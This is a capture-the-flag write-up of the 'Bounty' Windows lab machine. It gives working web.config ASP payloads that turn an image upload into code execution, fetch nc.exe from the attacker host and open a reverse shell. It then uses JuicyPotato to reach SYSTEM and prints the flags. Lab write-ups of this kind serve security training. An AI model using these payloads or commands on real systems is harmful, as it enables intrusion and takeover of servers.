Bounty logo

This is an easy windows box

Tools used


  • burpsuite
  • copy
  • dir
  • ffuf
  • juicypotato
  • nc
  • nmap
  • python
  • smbserver
  • type
  • wget
  • whoami
  • winpeas

Reconnaissance


Nmap

nmap -sC -sV -oA bounty 10.10.10.93 -v

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Here’s what nmap teaches us :

  • port 80 (HTTP) - IIS 7.5

There is only a web port so let’s see it :

Bounty website

There is only an image accessible here ! Go brute force files/directories with IIS file extension (asp, aspx) :

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.93/FUZZ -e .txt,.asp,.aspx -t 150

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.93/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .txt .asp .aspx 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

transfer.aspx           [Status: 200, Size: 941, Words: 89, Lines: 22]
uploadedfiles           [Status: 301, Size: 156, Words: 9, Lines: 2]

I have two results who looks very interesting, I might be able to upload things.

Image upload form

I tried to upload files with different extensions :

  • php, txt, asp, aspx - not working
  • png, jpg - works

Image upload success

We can found the upload file in the directory found by ffuf :

Image uploaded

From here, I tried to found a list of possible extension that I could upload, for that I used BurpSuite intruder. Upload a file intercept the request with BurpSuite, send it to the intruder :

BurpSuite intruder

The position of the payload is the file extension and as payload I used this wordlist from SecLists : /SecLists/Fuzzing/extensions-skipfish.fuzz.txt

Now launch the attack and wait for results. Here are the payloads who works :

BurpSuite working payload

Searching on Google what I could do with this extension, I found those articles :

I might be able to upload a web.config file and get code execution !

Exploit


Reading the articles, there is a test file when upload and executed who output ‘3’ if there is a code execution :

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

RCE success

Nice I have code execution, now with some more Googling, I found this repository : https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c, who gives 3 web.config files :

  • First : Download nc.exe on to the machine
  • Second : Launch nc.exe to get a reverse shell
  • Third : A webshell

I used the first two, upload nc.exe on the machine :

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' Set your settings
    strFileURL = "http://10.10.14.10:8000/nc.exe"
    strHDLocation = "C:\Windows\Temp\nc.exe"
' Fetch the file
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()
    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      objADOStream.Type = 1 'adTypeBinary
      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    'Set the stream position to the start
      Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing
      objADOStream.SaveToFile strHDLocation
      objADOStream.Close
      Set objADOStream = Nothing
    End if
    Set objXMLHTTP = Nothing
    
Response.write("<!-"&"-")
%>
-->

Start a python server so that the web.config can fetch the file needed (nc.exe) :

python -m SimpleHTTPServer

Then go to :

http://10.10.10.93/uploadedfiles/web.config

This execute the payload. On my python webserver, I see a connection who fetch nc.exe, nice ! Now upload the nc.exe launcher (second web.config from the repository) :

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("C:\Windows\Temp\nc.exe -d 10.10.14.10 1234 -e c:\windows\system32\cmd.exe")
Response.write("<!-"&"-")
%>
-->

Start a nc listener :

nc -lvp 1234

Go to :

http://10.10.10.93/uploadedfiles/web.config

See the listener :

nc -lvp 1234
listening on [any] 1234 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
bounty\merlin

Nice, I know have a reverse shell on the machine ! Trying to found the file user.txt :

c:\Users\merlin\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of c:\Users\merlin\Desktop

05/31/2018  12:17 AM    <DIR>          .
05/31/2018  12:17 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  11,682,705,408 bytes free

It’s not here, or maybe I can’t see it, so I search how to display hidden files and found this command :

c:\Users\merlin\Desktop>dir /ah
dir /ah
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of c:\Users\merlin\Desktop

05/30/2018  12:22 AM               282 desktop.ini
05/30/2018  11:32 PM                32 user.txt
               2 File(s)            314 bytes
               0 Dir(s)  11,682,705,408 bytes free

Here is the user.txt file ! Now to root ! I used winPEAS to get informations about the box, start a smb server for easy file transfert :

sudo smbserver.py -smb2support liodeus ./

Then launch winPEAS, I used the .bat version because I couldn’t make works the .exe one :

\\10.10.14.10\liodeus\winPEAS.bat

It gives me a lot of informations but the one I’m interested in is the privileges that I have, winPEAS gives us those privileges, but if you want to do it manually, here’s the command :

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If he user has SeImpersonate or SeAssignPrimaryToken priviles then you are SYSTEM (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato). Download the exploit :

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

Then start the smb server to transfert files :

sudo smbserver.py -smb2support liodeus ./

Copy over the Juicypotato and nc :

copy \\10.10.14.10\liodeus\nc.exe .
copy \\10.10.14.10\liodeus\JuicyPotato.exe .

Start another nc listener :

nc -lvp 12345

Launch JuicyPotato as follow :

c:\Users\merlin\Desktop>JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -a "/c c:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.14.10 12345" -t *
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -a "/c c:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.14.10 12345" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Go to the listener :

nc -lvp 12345
listening on [any] 12345 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49204
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

And I’m nt authority\system, nice ! Go read the flags now.

Miscellaneous


Flags


User.txt

c:\Users\merlin\Desktop>type user.txt
type user.txt
e29ad89891462e0b09741e3082f44a2f

Root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c837f7b699feef5475a0c079f9d4f5ea